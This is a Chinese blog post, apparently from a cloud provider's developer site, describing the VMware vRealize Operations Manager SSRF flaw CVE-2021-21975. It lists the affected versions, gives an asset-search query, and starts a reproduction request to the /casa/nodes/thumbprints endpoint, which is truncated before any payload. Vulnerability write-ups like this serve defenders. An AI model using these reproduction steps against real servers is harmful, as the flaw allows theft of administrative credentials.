VMware vRealize Operations Manager SSRF漏洞（CVE-2021-21975、SSRF）

2024-03-22 08:13:30 阅读次数：30

python，开发语言

一、漏洞描述

vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF)，以窃取管理凭据。

二、漏洞影响

vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0

cloud_foundation: 4.x 3.x

vRealize_suite_lifecycle_manager: 8.x

三、漏洞复现

title="vRealize Operations Manager"

访问登录页面如下

VMware vRealize Operations Manager SSRF漏洞（CVE-2021-21975、SSRF）

发送请求包如下

POST /casa/nodes/thumbprints HTTP/1.1
Host: 
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li

上一篇：Java包装类与工具类

下一篇：C语言解题 || 考研100种经典题型-数据类型-进制转换

推荐标签

作者介绍

天翼云小翼

天翼云用户

文章

25746

阅读量

3142071

活动

应用商城

合作伙伴

开发者

支持与服务

了解天翼云

VMware vRealize Operations Manager SSRF漏洞（CVE-2021-21975、SSRF）

VMware vRealize Operations Manager SSRF漏洞（CVE-2021-21975、SSRF）

相关文章

python中对super()函数解惑

Django实战技巧（2）-git代码仓分支管理技巧

python promethues_client 模块开发 exporter

python flask-caching模块缓存详解

设计模式python版（1）-设计模式简介与分类

ansible生产实践一 二进制安装ansible

不多见但是实用的部分C函数（2）

C实现杨辉三角

算法：实现进制转换类题目

轮转数组（元素位置对调、数据的左旋、右旋）

作者介绍

最新文章

python promethues_client 模块开发 exporter

Django实战技巧（2）-git代码仓分支管理技巧

不多见但是实用的部分C函数（2）

算法：实现进制转换类题目

C实现杨辉三角

内存函数及实现

热门文章

Linux实用命令authconfig和authconfig-tui（备忘）

Python高级变量类型

python学习——面向对象编程

Python数据库测试实战教程

一个简单的http server，处理get和post请求，Python实现

Python编程：生成器yield与yield from区别简单理解

热门标签

相关产品

弹性云主机

天翼云电脑（公众版）

对象存储

云硬盘

随机文章

python-面向对向-实例方法的继承

python字典开发三级菜单

Python基础教程（第3版）中文版 第18章 程序打包 （笔记）

前端工作小结19-await和anync

Java中类型的转化

Python的N种性能测试工具（timeit、profile、cProfile、line_profiler、memory_profiler、objgraph、Pyinstrument、PyCharm）

ansible生产实践一二进制安装ansible

Python基础教程（第3版）中文版第18章程序打包（笔记）